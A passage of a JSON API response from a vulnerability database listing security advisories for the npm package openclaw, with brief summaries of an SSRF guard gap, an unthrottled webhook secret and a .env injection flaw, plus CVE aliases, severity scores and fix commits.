"VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-35621", "GHSA-94pw-c6m8-p9p9" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pa1f-qzsh-efa9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89001?format=api", "vulnerability_id": "VCID-pae5-uyu7-k3c1", "summary": "OpenClaw: Browser press/type interaction routes missed complete navigation guard coverage\n## Summary\n\nBrowser press/type interaction routes missed complete navigation guard coverage.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nSome browser press/type style interactions could trigger navigation without complete post-action SSRF policy enforcement.\n\n## Technical Details\n\nThe fix applies a three-phase interaction navigation guard to navigation-capable interactions, including pressKey and type submit flows.\n\n## Fix\n\nThe issue was fixed in #62023 and #63226 and #63889. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe`\n- `5f5b3d733bdd791cb457f838514179e1288b10b3`\n- `e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894`\n- PR: #62023, #63226, #63889\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43580", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10026", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.1001", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.1159", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43580" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/62023", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/62023" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63226", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63226" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63889", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63889" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-536q-mj95-h29h", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-536q-mj95-h29h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43580", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43580" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-incomplete-navigation-guard-coverage-in-browser-interactions", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-incomplete-navigation-guard-coverage-in-browser-interactions" }, { "reference_url": "https://github.com/advisories/GHSA-536q-mj95-h29h", "reference_id": "GHSA-536q-mj95-h29h", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-536q-mj95-h29h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43580", "GHSA-536q-mj95-h29h" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "6.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pae5-uyu7-k3c1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91337?format=api", "vulnerability_id": "VCID-pc9z-x5wk-8ue7", "summary": "OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication\n## Summary\n\nNextcloud Talk webhook signature failures were not throttled even though the integration relies on an operator-configured shared secret that may be weak.\n\n## Impact\n\nAn attacker who could reach the webhook endpoint could brute-force weak secrets online and then forge inbound webhook events.\n\n## Affected Component\n\n`extensions/nextcloud-talk/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e403decb6e` (`nextcloud-talk: throttle repeated webhook auth failures`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33580", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.19981", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24086", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24069", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33580" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication" }, { "reference_url": "https://github.com/advisories/GHSA-9528-x887-j2fp", "reference_id": "GHSA-9528-x887-j2fp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9528-x887-j2fp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-33580", "GHSA-9528-x887-j2fp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pc9z-x5wk-8ue7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89369?format=api", "vulnerability_id": "VCID-pdmd-a4fg-8fcg", "summary": "OpenClaw: Workspace .env could inject OpenClaw runtime-control variables\n## Summary\n\nWorkspace .env could inject OpenClaw runtime-control variables.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nA malicious workspace `.env` file could set OpenClaw runtime-control variables affecting update sources, gateway URLs, ClawHub resolution, browser executable paths, and related behavior.\n\n## Technical Details\n\nThe fix blocks OpenClaw runtime-control keys and key families from workspace `.env` loading.\n\n## Fix\n\nThe issue was fixed in #62660. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `dbfcef319618158fa40b31cdac386ea34c392c0c`\n- PR: #62660\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43531", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.0832", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09649", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09673", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43531" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": 